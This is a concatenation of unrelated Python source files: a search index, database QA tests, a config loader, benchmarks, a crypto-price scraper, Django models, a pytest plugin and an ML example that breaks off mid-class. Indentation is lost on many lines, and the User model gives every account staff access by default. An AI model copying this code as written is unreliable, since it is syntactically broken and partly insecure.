state_name = indexes.CharField(model_attr="name")
no_of_cities = indexes.CharField()
status = indexes.CharField(model_attr="status")
no_of_jobposts = indexes.CharField()
is_duplicate = indexes.BooleanField(default=False)
def get_model(self):
return State
def index_queryset(self, using=None):
return self.get_model().objects.filter(status="Enabled")
def prepare_no_of_cities(self, obj):
return obj.state.all().count()
def prepare_no_of_jobposts(self, obj):
return obj.get_no_of_jobposts().count()
def prepare_is_duplicate(self, obj):
return obj.state.filter(name=obj.name).exists()
|
#coding:utf-8
#
# id: bugs.core_5097
# title: COMPUTED-BY expressions are not converted to their field type inside the engine
# description:
#
# tracker_id: CORE-5097
# min_versions: ['3.0']
# versions: 3.0
# qmid: None
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 3.0
# resources: None
substitutions_1 = [('^((?!sqltype|T2_CHECK|C1_CHECK).)*$', '')]
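# The substitution blanks every output line that does not mention sqltype,
# T2_CHECK or C1_CHECK, so only the SQLDA type info and the two check values
# are compared against expected_stdout_1.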
init_script_1 = """"""
db_1 = db_factory(sql_dialect=3, init=init_script_1)
test_script_1 = """
recreate table test1(
t0 timestamp default 'now'
,t1 timestamp computed by( 'now' )
,t2 computed by( extract(weekday from t1) )
);
recreate table test2 (n1 integer, c1 integer computed by (1.2));
commit;
insert into test1 default values;
insert into test2 values (0);
commit;
set list on;
set sqlda_display on;
select * from test1 rows 0;
select * from test2 rows 0;
set sqlda_display off;
select iif( t2 between 0 and 6, 1, 0 ) t2_check from test1;
select c1 || '' as c1_check from test2;
"""
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """
01: sqltype: 510 TIMESTAMP Nullable scale: 0 subtype: 0 len: 8
02: sqltype: 510 TIMESTAMP Nullable scale: 0 subtype: 0 len: 8
03: sqltype: 500 SHORT Nullable scale: 0 subtype: 0 len: 2
01: sqltype: 496 LONG Nullable scale: 0 subtype: 0 len: 4
02: sqltype: 496 LONG Nullable scale: 0 subtype: 0 len: 4
T2_CHECK 1
C1_CHECK 1
"""
@pytest.mark.version('>=3.0')
def test_1(act_1: Action):
act_1.expected_stdout = expected_stdout_1
act_1.execute()
assert act_1.clean_expected_stdout == act_1.clean_stdout
|
from enum import Enum
from typing import Any
from importlib import import_module
class ValidationError(Exception):
"""
Error class for validation failed
"""
def __init__(self, payload: dict):
"""
        :param payload: validation errors keyed by field name
"""
self.payload = payload
def generate_err_msg(self, payload: dict, indent: int = 0) -> str:
"""
Generate human-friendly error message
example output:
key1: Error message
key2:
inner_key: error message
inner_key2:
key3: error message
"""
        make_indent = ' ' * indent
previous_text = ''
for (key, errors) in payload.items():
for err in errors:
                if isinstance(err, dict):
                    previous_text += '{}{}:\n'.format(make_indent, key)
                    previous_text += self.generate_err_msg(err, indent + 1)
                else:
                    previous_text += '{}{}: {}\n'.format(make_indent, key, err)
return previous_text
@property
def message(self):
return self.generate_err_msg(self.payload)
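# Hedged usage sketch (not part of the original module): the payload maps field
# names to lists of error strings, or to nested dicts for sub-fields, mirroring
# the `errors` attribute of a cerberus Validator.
def _demo_validation_error():
    err = ValidationError({
        'port': ['must be of integer type'],
        'database': [{'host': ['required field']}],
    })
    # err.message renders the payload with one space of indentation per level:
    # port: must be of integer type
    # database:
    #  host: required field
    return err.message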
class CatConfig:
def __init__(self, format: str = 'json', validator_schema: dict = None, data: dict = None):
"""
        :param format: format of the data to be read (json/toml/yaml)
:param validator_schema: Schema for validator (see https://docs.python-cerberus.org/en/stable/usage.html)
:param data: Config data
"""
self._parser = None
self._data = {}
        if data is not None:
self._data = data
self._validator_schema = validator_schema
if format:
self._import_parser(format)
self._config = {}
def _import_parser(self, parser_name: str):
if parser_name == 'json':
self._parser = import_module('json')
elif parser_name == 'toml':
try:
self._parser = import_module('toml')
except ImportError:
raise Exception(
"CatConfig needs toml parser to work, "
"please add `toml` module to your project")
elif parser_name == 'yaml':
try:
self._parser = import_module('yaml')
                # PyYAML exposes `load` rather than `loads`; alias it so the
                # rest of the code can treat every parser uniformly.
                self._parser.loads = self._parser.load
except ImportError:
raise Exception(
"CatConfig needs yaml parser to work, "
"please add `pyyaml` module to your project\n")
else:
raise Exception('Unsupported parser type')
def load_from_file(self, file_path: str, format: 'str' = None) -> None:
"""
Update config from file
:param file_path: config file path
:param format: format of config file (default: json)
"""
with open(file_path, 'r') as f:
self.load_from_string(f.read(), format)
def load_from_string(self, data: str, format: 'str' = None) -> None:
"""
Update config from string and validate
:param data: target data
:param format: format of config file (default: json)
"""
if format:
self._import_parser(format)
return self.load(self._parser.loads(data))
def load(self, data: dict) -> None:
"""
Update config from param `data`
:param data: data
"""
if self._validator_schema:
self.validate(data)
self._data.update(data)
    def validate(self, data: dict) -> None:
"""
Validate data
:param data: config data
"""
try:
cerberus = import_module('cerberus')
except ImportError:
            raise Exception('CatConfig needs the `cerberus` module for validation, '
                            'please add `cerberus` module to your project.')
v = cerberus.Validator(self._validator_schema)
        if not v.validate(data):
            raise ValidationError(v.errors)
def update(self, data: dict) -> None:
"""
Update config item
:param data: data to be updated
"""
self._data.update(data)
def set(self, key: str, value: str) -> None:
"""
Set config value
:param key: key of config item
:param value: value of config item
"""
return self.update({key: value})
def get(self, key: str=None) -> Any:
"""
        Get a config item by key
        Returns the whole config data object if `key` is None
        :param key: key of the config item
"""
        if key is None:
return self._data
if key in self._data:
data = self._data.get(key)
if isinstance(data, dict):
return CatConfig(data=data)
elif isinstance(data, list):
return [CatConfig(data=x) for x in data]
else:
return data
return CatConfig()
def __getitem__(self, key: str) -> Any:
return self.get(key)
def __bool__(self):
"""
Return False if `self._data` has no item
"""
return len(self._data) != 0
def __getattr__(self, name: str) -> Any:
return self.__getitem__(name)
def __eq__(self, b):
"""
        Make an empty CatConfig compare equal to None
"""
if b == None:
if len(self._data.keys()) == 0:
return True
return self._data == b
def __str__(self):
if self._data == {}:
return 'None'
return str(self._data)
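# Hedged usage sketch (not part of the original module): JSON is the default
# format, so no optional parser is needed here; `toml`, `pyyaml` and `cerberus`
# are only required for those formats or for schema validation.
def _demo_catconfig():
    config = CatConfig()
    config.load_from_string('{"port": 8080, "db": {"host": "localhost"}}')
    assert config.get('port') == 8080
    assert config.db.host == 'localhost'  # nested dicts come back as CatConfig
    assert not config['missing']          # absent keys yield an empty, falsy CatConfig
    return config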
|
from engine.utils import RF_sq64, sq64_to_sq120, print_board
def react_chess_board_to_IZII_board(board):
    """Convert a comma-separated "piece@square" board string from the React
    front end into a 120-square IZII board string, where 'x' marks off-board
    padding and 'o' marks an empty playable square."""
    if board is None:
        exit()
    izii_board = ["x"] * 120
    pieces = board.split(',')
for i in range(len(izii_board)):
if i >= 20 and i < 100:
if i % 10 != 0 and i % 10 != 9:
izii_board[i] = 'o'
for p in pieces:
# print("pp", p)
piece_with_RF = p.split('@')
# print("look: ", piece_with_RF)
piece = piece_with_RF[0]
RF = piece_with_RF[1]
sq64 = RF_sq64(RF[0], RF[1])
sq120 = sq64_to_sq120(sq64)
izii_board[sq120] = piece
return ''.join(izii_board)
|
import numpy as np
import pandas as pd
import pytest
import ibis
import ibis.expr.datatypes as dt
from ibis.backends.pandas.udf import udf
def make_t():
return ibis.table(
[
('_timestamp', 'int32'),
('dim1', 'int32'),
('dim2', 'int32'),
('valid_seconds', 'int32'),
('meas1', 'int32'),
('meas2', 'int32'),
('year', 'int32'),
('month', 'int32'),
('day', 'int32'),
('hour', 'int32'),
('minute', 'int32'),
],
name="t",
)
@pytest.fixture
def t():
return make_t()
def make_base(t):
return (
(t.year > 2016)
| ((t.year == 2016) & (t.month > 6))
| ((t.year == 2016) & (t.month == 6) & (t.day > 6))
| ((t.year == 2016) & (t.month == 6) & (t.day == 6) & (t.hour > 6))
| (
(t.year == 2016)
& (t.month == 6)
& (t.day == 6)
& (t.hour == 6)
& (t.minute >= 5)
)
) & (
(t.year < 2016)
| ((t.year == 2016) & (t.month < 6))
| ((t.year == 2016) & (t.month == 6) & (t.day < 6))
| ((t.year == 2016) & (t.month == 6) & (t.day == 6) & (t.hour < 6))
| (
(t.year == 2016)
& (t.month == 6)
& (t.day == 6)
& (t.hour == 6)
& (t.minute <= 5)
)
)
@pytest.fixture
def base(t):
return make_base(t)
def make_large_expr(t, base):
src_table = t[base]
src_table = src_table.mutate(
_timestamp=(src_table['_timestamp'] - src_table['_timestamp'] % 3600)
.cast('int32')
.name('_timestamp'),
valid_seconds=300,
)
aggs = []
for meas in ['meas1', 'meas2']:
aggs.append(src_table[meas].sum().cast('float').name(meas))
src_table = src_table.aggregate(
aggs, by=['_timestamp', 'dim1', 'dim2', 'valid_seconds']
)
part_keys = ['year', 'month', 'day', 'hour', 'minute']
ts_col = src_table['_timestamp'].cast('timestamp')
new_cols = {}
for part_key in part_keys:
part_col = getattr(ts_col, part_key)()
new_cols[part_key] = part_col
src_table = src_table.mutate(**new_cols)
return src_table[
[
'_timestamp',
'dim1',
'dim2',
'meas1',
'meas2',
'year',
'month',
'day',
'hour',
'minute',
]
]
@pytest.fixture
def large_expr(t, base):
return make_large_expr(t, base)
@pytest.mark.benchmark(group="construction")
@pytest.mark.parametrize(
"construction_fn",
[
pytest.param(lambda *_: make_t(), id="small"),
pytest.param(lambda t, *_: make_base(t), id="medium"),
pytest.param(lambda t, base: make_large_expr(t, base), id="large"),
],
)
def test_construction(benchmark, construction_fn, t, base):
benchmark(construction_fn, t, base)
@pytest.mark.benchmark(group="builtins")
@pytest.mark.parametrize(
"expr_fn",
[
pytest.param(lambda t, _base, _large_expr: t, id="small"),
pytest.param(lambda _t, base, _large_expr: base, id="medium"),
pytest.param(lambda _t, _base, large_expr: large_expr, id="large"),
],
)
@pytest.mark.parametrize("builtin", [hash, str])
def test_builtins(benchmark, expr_fn, builtin, t, base, large_expr):
expr = expr_fn(t, base, large_expr)
benchmark(builtin, expr)
@pytest.mark.benchmark(group="compilation")
@pytest.mark.parametrize("module", ["impala", "sqlite"])
@pytest.mark.parametrize(
"expr_fn",
[
pytest.param(lambda t, _base, _large_expr: t, id="small"),
pytest.param(lambda _t, base, _large_expr: base, id="medium"),
pytest.param(lambda _t, _base, large_expr: large_expr, id="large"),
],
)
def test_compile(benchmark, module, expr_fn, t, base, large_expr):
try:
mod = getattr(ibis, module)
except AttributeError as e:
pytest.skip(str(e))
else:
expr = expr_fn(t, base, large_expr)
benchmark(mod.compile, expr)
@pytest.fixture
def pt():
n = 60_000
data = pd.DataFrame(
{
'key': np.random.choice(16000, size=n),
'low_card_key': np.random.choice(30, size=n),
'value': np.random.rand(n),
'timestamps': pd.date_range(
start='now', periods=n, freq='s'
).values,
'timestamp_strings': pd.date_range(
start='now', periods=n, freq='s'
).values.astype(str),
'repeated_timestamps': pd.date_range(
start='2018-09-01', periods=30
).repeat(int(n / 30)),
}
)
return ibis.pandas.connect(dict(df=data)).table('df')
def high_card_group_by(t):
return t.groupby(t.key).aggregate(avg_value=t.value.mean())
def cast_to_dates(t):
return t.timestamps.cast(dt.date)
def cast_to_dates_from_strings(t):
return t.timestamp_strings.cast(dt.date)
def multikey_group_by_with_mutate(t):
return (
t.mutate(dates=t.timestamps.cast('date'))
.groupby(['low_card_key', 'dates'])
.aggregate(avg_value=lambda t: t.value.mean())
)
def simple_sort(t):
return t.sort_by([t.key])
def simple_sort_projection(t):
return t[['key', 'value']].sort_by(['key'])
def multikey_sort(t):
return t.sort_by(['low_card_key', 'key'])
def multikey_sort_projection(t):
return t[['low_card_key', 'key', 'value']].sort_by(['low_card_key', 'key'])
def low_card_rolling_window(t):
return ibis.trailing_range_window(
ibis.interval(days=2),
order_by=t.repeated_timestamps,
group_by=t.low_card_key,
)
def low_card_grouped_rolling(t):
return t.value.mean().over(low_card_rolling_window(t))
def high_card_rolling_window(t):
return ibis.trailing_range_window(
ibis.interval(days=2),
order_by=t.repeated_timestamps,
group_by=t.key,
)
def high_card_grouped_rolling(t):
return t.value.mean().over(high_card_rolling_window(t))
@udf.reduction(['double'], 'double')
def my_mean(series):
return series.mean()
def low_card_grouped_rolling_udf_mean(t):
return my_mean(t.value).over(low_card_rolling_window(t))
def high_card_grouped_rolling_udf_mean(t):
return my_mean(t.value).over(high_card_rolling_window(t))
@udf.analytic(['double'], 'double')
def my_zscore(series):
return (series - series.mean()) / series.std()
def low_card_window(t):
return ibis.window(group_by=t.low_card_key)
def high_card_window(t):
return ibis.window(group_by=t.key)
def low_card_window_analytics_udf(t):
return my_zscore(t.value).over(low_card_window(t))
def high_card_window_analytics_udf(t):
return my_zscore(t.value).over(high_card_window(t))
@udf.reduction(['double', 'double'], 'double')
def my_wm(v, w):
return np.average(v, weights=w)
def low_card_grouped_rolling_udf_wm(t):
return my_wm(t.value, t.value).over(low_card_rolling_window(t))
def high_card_grouped_rolling_udf_wm(t):
return my_wm(t.value, t.value).over(low_card_rolling_window(t))
@pytest.mark.benchmark(group="execution")
@pytest.mark.parametrize(
"expression_fn",
[
pytest.param(high_card_group_by, id="high_card_group_by"),
pytest.param(cast_to_dates, id="cast_to_dates"),
pytest.param(
cast_to_dates_from_strings, id="cast_to_dates_from_strings"
),
pytest.param(
multikey_group_by_with_mutate, id="multikey_group_by_with_mutate"
),
pytest.param(simple_sort, id="simple_sort"),
pytest.param(simple_sort_projection, id="simple_sort_projection"),
pytest.param(multikey_sort, id="multikey_sort"),
pytest.param(multikey_sort_projection, id="multikey_sort_projection"),
pytest.param(low_card_grouped_rolling, id="low_card_grouped_rolling"),
pytest.param(
high_card_grouped_rolling, id="high_card_grouped_rolling"
),
pytest.param(
low_card_grouped_rolling_udf_mean,
id="low_card_grouped_rolling_udf_mean",
),
pytest.param(
high_card_grouped_rolling_udf_mean,
id="high_card_grouped_rolling_udf_mean",
),
pytest.param(
low_card_window_analytics_udf, id="low_card_window_analytics_udf"
),
pytest.param(
high_card_window_analytics_udf, id="high_card_window_analytics_udf"
),
pytest.param(
low_card_grouped_rolling_udf_wm,
id="low_card_grouped_rolling_udf_wm",
),
pytest.param(
high_card_grouped_rolling_udf_wm,
id="high_card_grouped_rolling_udf_wm",
),
],
)
def test_execute(benchmark, expression_fn, pt):
expr = expression_fn(pt)
benchmark(expr.execute)
|
import time
from threading import Thread
def timestamp_datetime(value):
    """Format a Unix timestamp as 'YYYY-MM-DD HH:MM:SS' in local time."""
    format = '%Y-%m-%d %H:%M:%S'
    value = time.localtime(value)
    dt = time.strftime(format, value)
    return dt
def log(s):
    """Print a message prefixed with the current local time."""
    print("[", timestamp_datetime(time.time()), "]", s)
|
from time import sleep
from urllib.request import urlopen, Request
from bs4 import BeautifulSoup
from celery.schedules import crontab
from celery.task import periodic_task
from crypto.models import Cryptocurrency
# @shared_task
@periodic_task(
run_every=(crontab(minute="*/15")),
name="create_cryptocurrency",
# ignore_result=True
)
def create_cryptocurrency():
print("Crawling data and creating objects in database ..")
req = Request("https://coinranking.com", headers={"User-Agent": "Mozilla/5.0"})
html = urlopen(req).read()
bs = BeautifulSoup(html, "html.parser")
# Find first 5 table rows
rows = bs.find("tbody", class_="table__body").find_all("tr", class_="table__row")[
0:5
]
for row in rows:
cryptocurrency = (
row.find("span", class_="profile__name")
.get_text()
.strip()
.replace("\n", "")
)
values = row.find_all("div", class_="valuta")
price = values[0].get_text().strip().replace("\n", "")
market_cap = values[1].get_text().strip().replace("\n", "")
change = (
row.find("div", class_="change")
.find("span")
.get_text()
.strip()
.replace("\n", "")
)
print(
{
"cryptocurrency": cryptocurrency,
"price": price,
"market_cap": market_cap,
"change": change,
}
)
# Create object in database from crawled data
Cryptocurrency.objects.create(
cryptocurrency=cryptocurrency,
price=price,
market_cap=market_cap,
change=change,
)
# Sleep 3 seconds to avoid any errors
sleep(3)
# @shared_task
@periodic_task(
run_every=(crontab(minute="*/15")),
name="update_cryptocurrency",
)
def update_cryptocurrency():
print("Updating data ..")
req = Request("https://coinranking.com", headers={"User-Agent": "Mozilla/5.0"})
html = urlopen(req).read()
bs = BeautifulSoup(html, "html.parser")
rows = bs.find("tbody", class_="table__body").find_all("tr", class_="table__row")[
0:5
]
for row in rows:
cryptocurrency = (
row.find("span", class_="profile__name")
.get_text()
.strip()
.replace("\n", "")
)
values = row.find_all("div", class_="valuta")
price = values[0].get_text().strip().replace("\n", "")
market_cap = values[1].get_text().strip().replace("\n", "")
change = (
row.find("div", class_="change")
.find("span")
.get_text()
.strip()
.replace("\n", "")
)
print(
{
"cryptocurrency": cryptocurrency,
"price": price,
"market_cap": market_cap,
"change": change,
}
)
data = {
"cryptocurrency": cryptocurrency,
"price": price,
"market_cap": market_cap,
"change": change,
}
Cryptocurrency.objects.filter(cryptocurrency=cryptocurrency).update(**data)
sleep(3)
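# Hedged refactor sketch (not part of the original tasks): both periodic tasks
# above scrape the same five table rows, so the parsing could be factored into
# one helper that returns dicts with the same field names used above.
def scrape_top_cryptocurrencies(limit=5):
    req = Request("https://coinranking.com", headers={"User-Agent": "Mozilla/5.0"})
    bs = BeautifulSoup(urlopen(req).read(), "html.parser")
    rows = bs.find("tbody", class_="table__body").find_all("tr", class_="table__row")[:limit]
    results = []
    for row in rows:
        values = row.find_all("div", class_="valuta")
        results.append({
            "cryptocurrency": row.find("span", class_="profile__name").get_text().strip().replace("\n", ""),
            "price": values[0].get_text().strip().replace("\n", ""),
            "market_cap": values[1].get_text().strip().replace("\n", ""),
            "change": row.find("div", class_="change").find("span").get_text().strip().replace("\n", ""),
        })
    return results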
|
# generated by datamodel-codegen:
# filename: schema/entity/data/database.json
# timestamp: 2021-09-27T15:46:37+00:00
from __future__ import annotations
from typing import Optional
from pydantic import BaseModel, Field, constr
from ...type import basic, entityReference, usageDetails
class DatabaseName(BaseModel):
__root__: constr(regex=r'^[^.]*$', min_length=1, max_length=64) = Field(
..., description='Name that identifies the database.'
)
class Database(BaseModel):
id: Optional[basic.Uuid] = Field(
None, description='Unique identifier that identifies this database instance.'
)
name: DatabaseName = Field(..., description='Name that identifies the database.')
fullyQualifiedName: Optional[str] = Field(
None,
description="Name that uniquely identifies a database in the format 'ServiceName.DatabaseName'.",
)
description: Optional[str] = Field(
None, description='Description of the database instance.'
)
href: Optional[basic.Href] = Field(
None, description='Link to the resource corresponding to this entity.'
)
owner: Optional[entityReference.EntityReference] = Field(
None, description='Owner of this database.'
)
service: entityReference.EntityReference = Field(
...,
description='Link to the database cluster/service where this database is hosted in.',
)
usageSummary: Optional[usageDetails.TypeUsedToReturnUsageDetailsOfAnEntity] = Field(
None, description='Latest usage information for this database.'
)
tables: Optional[entityReference.EntityReferenceList] = Field(
None, description='References to tables in the database.'
)
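# Hedged usage sketch (not part of the generated module): DatabaseName is a
# pydantic custom root type, so it is constructed via `__root__` and rejects
# names containing a '.' (per the regex above).
def _demo_database_name():
    ok = DatabaseName(__root__='sales_db')
    # DatabaseName(__root__='service.sales_db') would raise pydantic.ValidationError
    return ok.__root__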
|
from django.db import models
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager, \
PermissionsMixin
from django.conf import settings
class UserManager(BaseUserManager):
def create_user(self, email, password=None, **extra_fields):
"""Creates and Saves a New User"""
if not email:
raise ValueError('Users must have a Valid Email Address')
user = self.model(email=self.normalize_email(email), **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, password):
"""Creates and Saves a new superuser"""
user = self.create_user(email, password)
user.is_staff = True
user.is_superuser = True
user.save(using=self._db)
return user
class User(AbstractBaseUser, PermissionsMixin):
"""Custom User Model that supports using email instead of username"""
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=True)
objects = UserManager()
USERNAME_FIELD = 'email'
class Tag(models.Model):
"""Tag to be used for a recipe """
name = models.CharField(max_length=255)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
)
def __str__(self):
return self.name
class Ingredient(models.Model):
"""Ingredient to be used for a recipe """
name = models.CharField(max_length=255)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
)
def __str__(self):
return self.name
class Recipe(models.Model):
"""Recipe Object"""
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
)
title = models.CharField(max_length=255)
time_minutes = models.IntegerField()
price = models.DecimalField(max_digits=5, decimal_places=2)
link = models.CharField(max_length=255, blank=True)
ingredients = models.ManyToManyField('Ingredient')
tags = models.ManyToManyField('Tag')
def __str__(self):
return self.title
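# Hedged usage sketch (not part of the original models module; assumes
# migrations are applied, e.g. inside a test case or `manage.py shell`):
def _demo_create_recipe():
    from decimal import Decimal
    user = User.objects.create_user(email='cook@example.com', password='test-pass-123')
    recipe = Recipe.objects.create(user=user, title='Dal', time_minutes=30, price=Decimal('4.50'))
    recipe.tags.add(Tag.objects.create(user=user, name='Vegan'))
    return recipe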
|
import re
import pickle
import tempfile
import pytest
from _pytest.config import Config
from _pytest._io.terminalwriter import TerminalWriter
from _pytest.reports import TestReport
from pytest_fold.tui_pytermtk import main as tuitk
from pytest_fold.tui_textual1 import main as tuitxt1
from pytest_fold.tui_textual2 import main as tuitxt2
from pytest_fold.utils import (
test_session_starts_matcher,
errors_section_matcher,
failures_section_matcher,
warnings_summary_matcher,
passes_section_matcher,
short_test_summary_matcher,
lastline_matcher,
MARKERS,
REPORTFILE,
MARKEDTERMINALOUTPUTFILE,
UNMARKEDTERMINALOUTPUTFILE,
)
# Don't collect tests from any of these files
collect_ignore = [
"setup.py",
"plugin.py",
]
# A list of TestReport objects generated by Pytest during test run.
# Each TestReport represents a single test's operation during one of
# Pytest's three phases: setup | call | teardown
reports = []
def pytest_addoption(parser):
"""Define the plugin's option flags as presented by Pytest"""
group = parser.getgroup("fold")
group.addoption(
"--fold",
action="store_true",
help="fold failed test output sections",
)
group.addoption(
"--fold-tui",
"--ft",
action="store",
default="pytermtk",
help="specify user interface ('pytermtk' ' k' | 'textual1' 't1' | 'textual2' 't2' | 'none' 'n')",
choices=["pytermtk", "k", "textual1", "t1", "textual2", "t2", "none", "n"],
)
def pytest_report_teststatus(report: TestReport, config: Config):
"""Construct list(s) of individial TestReport instances"""
reports.append(report)
@pytest.hookimpl(trylast=True)
def pytest_configure(config: Config) -> None:
"""
Write console output to a file for use by TUI
This code works by looking at every line sent by Pytest to the terminal,
and based on its category, marking or not marking it
"""
config.option.verbose = (
1 # force verbose mode for easier parsing of final test results
)
config.option.reportchars = (
"A" # force "display all" mode so all results can be shown
)
if config.option.fold:
tr = config.pluginmanager.getplugin("terminalreporter")
if tr is not None:
# identify and mark the very first line of terminal output
try:
config._pyfoldfirsttime
except AttributeError:
config._pyfoldfirsttime = True
config._pyfold_unmarked_outputfile = tempfile.TemporaryFile("wb+")
config._pyfold_marked_outputfile = tempfile.TemporaryFile("wb+")
oldwrite = tr._tw.write
# identify and mark each results section
def tee_write(s, **kwargs):
if re.search(test_session_starts_matcher, s):
config._pyfold_marked_outputfile.write(
(MARKERS["pytest_fold_test_session_starts"] + "\n").encode(
"utf-8"
)
)
if re.search(errors_section_matcher, s):
config._pyfold_marked_outputfile.write(
(MARKERS["pytest_fold_errors_section"] + "\n").encode("utf-8")
)
if re.search(failures_section_matcher, s):
config._pyfold_marked_outputfile.write(
(MARKERS["pytest_fold_failures_section"] + "\n").encode("utf-8")
)
if re.search(warnings_summary_matcher, s):
config._pyfold_marked_outputfile.write(
(MARKERS["pytest_fold_warnings_summary"] + "\n").encode("utf-8")
)
if re.search(passes_section_matcher, s):
config._pyfold_marked_outputfile.write(
(MARKERS["pytest_fold_passes_section"] + "\n").encode("utf-8")
)
if re.search(short_test_summary_matcher, s):
config._pyfold_marked_outputfile.write(
(MARKERS["pytest_fold_short_test_summary"] + "\n").encode(
"utf-8"
)
)
if re.search(lastline_matcher, s):
config._pyfold_marked_outputfile.write(
(MARKERS["pytest_fold_last_line"] + "\n").encode("utf-8")
)
# Write this line's text along with its markup info to console
oldwrite(s, **kwargs)
# Mark up this line's text by passing it to an instance of TerminalWriter's
# 'markup' method. Do not pass "flush" to the method or it will throw an error.
s1 = s
kwargs.pop("flush") if "flush" in kwargs.keys() else None
s1 = TerminalWriter().markup(s, **kwargs)
# Encode the marked up line so it can be written to the config object.
                # The Pytest config object can be used by plugins for conveying stateful
# info across an entire test run session.
if isinstance(s1, str):
marked_up = s1.encode("utf-8")
config._pyfold_marked_outputfile.write(marked_up)
# Write this line's original (unmarked) text to unmarked file
s_orig = s
kwargs.pop("flush") if "flush" in kwargs.keys() else None
s_orig = TerminalWriter().markup(s, **kwargs)
if isinstance(s_orig, str):
unmarked_up = s_orig.encode("utf-8")
config._pyfold_unmarked_outputfile.write(unmarked_up)
# Write to both terminal/console and tempfiles:
# _pyfold_marked_outputfile, _pyfold_unmarked_outputfile
tr._tw.write = tee_write
def pytest_unconfigure(config: Config):
"""
Write terminal and test results info to files for use by TUI
"""
# Write terminal output to file
if hasattr(config, "_pyfold_marked_outputfile"):
# get terminal contents, then write file
config._pyfold_marked_outputfile.seek(0)
markedsessionlog = config._pyfold_marked_outputfile.read()
config._pyfold_marked_outputfile.close()
if hasattr(config, "_pyfold_unmarked_outputfile"):
# get terminal contents, then write file
config._pyfold_unmarked_outputfile.seek(0)
unmarkedsessionlog = config._pyfold_unmarked_outputfile.read()
config._pyfold_unmarked_outputfile.close()
# Undo our patching in the terminal reporter
config.pluginmanager.getplugin("terminalreporter")
# Write marked-up results to file
with open(MARKEDTERMINALOUTPUTFILE, "wb") as marked_file:
marked_file.write(markedsessionlog)
# Write un-marked-up results to file
with open(UNMARKEDTERMINALOUTPUTFILE, "wb") as unmarked_file:
unmarked_file.write(unmarkedsessionlog)
# Write the reports list to file
with open(REPORTFILE, "wb") as report_file:
pickle.dump(reports, report_file)
# Launch the TUI
if config.getoption("--fold") == True:
pyfold_tui(config)
def pyfold_tui(config: Config) -> None:
"""
Final code invocation after Pytest run has completed.
This method calls the Pyfold TUI to display final results.
"""
# disable capturing while TUI runs to avoid error `redirected stdin is pseudofile, has
# no fileno()`; adapted from https://githubmemory.com/repo/jsbueno/terminedia/issues/25
if not config.getoption("--fold"):
return
capmanager = config.pluginmanager.getplugin("capturemanager")
try:
capmanager.suspend_global_capture(in_=True)
finally:
if config.getoption("--ft") in ["k", "pytermtk"]:
tuitk()
elif config.getoption("--ft") in ["t1", "textual1"]:
tuitxt1()
elif config.getoption("--ft") in ["t2", "textual2"]:
tuitxt2()
elif config.getoption("--ft") not in ["n", "none"]:
print(f"Incorrect choice for fold-tui: {config.getoption('--ft')}")
capmanager.resume_global_capture()
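# Hedged sketch (not part of the original plugin): pytest_unconfigure() pickles
# the collected TestReport objects to REPORTFILE, so a TUI or a debugging
# session can load them back like this.
def load_reports(path=REPORTFILE):
    with open(path, "rb") as report_file:
        return pickle.load(report_file)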
|
import argparse
import os
import sys
import time
import numpy as np
from ConfigSpace.configuration_space import ConfigurationSpace
from ConfigSpace.hyperparameters import UniformFloatHyperparameter, \
UniformIntegerHyperparameter, CategoricalHyperparameter, \
UnParametrizedHyperparameter, Constant
from sklearn.datasets import load_iris
from sklearn.metrics import balanced_accuracy_score
from sklearn.model_selection import train_test_split
sys.path.append(os.getcwd())
from mindware.utils.data_manager import DataManager
from mindware.estimators import Classifier
from mindware.components.models.base_model import BaseClassificationModel
from mindware.components.models.classification import add_classifier
from mindware.components.utils.configspace_utils import check_none
from mindware.components.utils.constants import DENSE, SPARSE, UNSIGNED_DATA, PREDICTIONS
parser = argparse.ArgumentParser()
parser.add_argument('--time_limit', type=int, default=1200)
args = parser.parse_args()
time_limit = args.time_limit
class UserDefinedDecisionTree(BaseClassificationModel):
def __init__(self, criterion, max_features, max_depth_factor,
min_samples_split, min_samples_leaf, min_weight_fraction_leaf,
max_leaf_nodes, min_impurity_decrease, class_weight=None,
random_state=None):
self.criterion = criterion
self.max_features = max_features
self.max_depth_factor = max_depth_factor
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.max_leaf_nodes = max_leaf_nodes
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.min_impurity_decrease = min_impurity_decrease
self.random_state = random_state
self.class_weight = class_weight
self.estimator = None
self.time_limit = None
def fit(self, X, y, sample_weight=None):
from sklearn.tree import DecisionTreeClassifier
self.max_features = float(self.max_features)
# Heuristic to set the tree depth
if check_none(self.max_depth_factor):
max_depth_factor = self.max_depth_factor = None
else:
num_features = X.shape[1]
self.max_depth_factor = int(self.max_depth_factor)
max_depth_factor = max(
1,
int(np.round(self.max_depth_factor * num_features, 0)))
self.min_samples_split = int(self.min_samples_split)
self.min_samples_leaf = int(self.min_samples_leaf)
if check_none(self.max_leaf_nodes):
self.max_leaf_nodes = None
else:
self.max_leaf_nodes = int(self.max_leaf_nodes)
self.min_weight_fraction_leaf = float(self.min_weight_fraction_leaf)
self.min_impurity_decrease = float(self.min_impurity_decrease)
self.estimator = DecisionTreeClassifier(
criterion=self.criterion,
max_depth=max_depth_factor,
min_samples_split=self.min_samples_split,
min_samples_leaf=self.min_samples_leaf,
max_leaf_nodes=self.max_leaf_nodes,
min_weight_fraction_leaf=self.min_weight_fraction_leaf,
min_impurity_decrease=self.min_impurity_decrease,
class_weight=self.class_weight,
random_state=self.random_state)
self.estimator.fit(X, y, sample_weight=sample_weight)
return self
def predict(self, X):
if self.estimator is None:
raise NotImplementedError
return self.estimator.predict(X)
def predict_proba(self, X):
if self.estimator is None:
raise NotImplementedError()
probas = self.estimator.predict_proba(X)
return probas
@staticmethod
def get_properties(dataset_properties=None):
return {'shortname': 'DT',
'name': 'Decision Tree Classifier',
'handles_regression': False,
'handles_classification': True,
'handles_multiclass': True,
'handles_multilabel': True,
'is_deterministic': True,
'input': (DENSE, SPARSE, UNSIGNED_DATA),
'output': (PREDICTIONS,)}
@staticmethod
